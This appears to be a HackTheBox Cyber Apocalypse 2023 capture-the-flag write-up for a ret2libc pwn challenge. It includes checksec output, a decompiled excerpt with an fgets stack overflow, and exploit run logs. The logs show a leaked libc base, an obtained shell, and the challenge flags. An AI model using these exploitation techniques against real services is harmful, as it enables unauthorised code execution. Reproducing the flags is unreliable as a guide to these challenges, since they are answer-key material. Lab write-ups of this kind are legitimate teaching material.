```
Arch:     amd64-64-little
RELRO:    Full RELRO        // GOT cannot be overwritten
Stack:    No canary found   // no stack canary
NX:       NX enabled        // stack is not executable
PIE:      No PIE (0x400000) // addresses do not change between runs
RUNPATH:  b'./glibc/'
```
```
$ python pwn_lab.py
[+] Opening connection to 104.248.169.177 on port 31597: Done
/home/yui/Desktop/pwn_lab.py:12: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  p.sendlineafter(b'>>','69')
[*] Switching to interactive mode
[-] YOU FAILED TO ESCAPE!
 \O/
  |
 / \
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ ▒-▸ ▒ ▒ ▒ ▒-▸ ▒ ▒ ▒ ▒-▸ ▒ ▒ ▒ ▒-▸ ▒ ▒ ▒ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▲△▲△▲△▲△▲△▒
Congratulations on escaping! Here is a sacred spell to help you continue your journey:
HTB{3sc4p3_fr0m_4b0v3}
[*] Got EOF while reading in interactive
```
# HTB-CA2023 PWN: pwn_pandoras_box (ret2libc)

## Program analysis

A classic ret2libc. As usual, start by checking which mitigations the binary was built with:
```
Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)
RUNPATH:  b'./glibc/'
```
Decompiled tail of the relevant function (excerpt; the declaration of the stack buffer `s` is not part of this snippet):

```c
    if ( v7 != 2 )
    {
        fprintf(_bss_start, "%s\nWHAT HAVE YOU DONE?! WE ARE DOOMED!\n\n", "\x1B[1;31m");
        exit(1312);
    }
    fwrite("\nInsert location of the library: ", 1uLL, 0x21uLL, _bss_start);
    // reads up to 255 bytes into the stack buffer s; with no canary, an
    // oversized line overwrites the saved return address (the ret2libc entry point)
    fgets(s, 256, stdin);
    return fwrite(
        "\nWe will deliver the mythical box to the Library for analysis, thank you!\n\n",
        1uLL,
        0x4BuLL,
        _bss_start);
}
```
```
[+] Opening connection to 144.126.196.198 on port 30070: Done
[*] '/home/yui/Desktop/glibc/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] '/home/yui/Desktop/pb'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    RUNPATH:  b'./glibc/'
[*] LIBC BASE: 0x7f86e9faa000
[*] Switching to interactive mode

We will deliver the mythical box to the Library for analysis, thank you!

$ ls
flag.txt glibc pb
$ cat flag.txt
HTB{r3turn_2_P4nd0r4?!}
```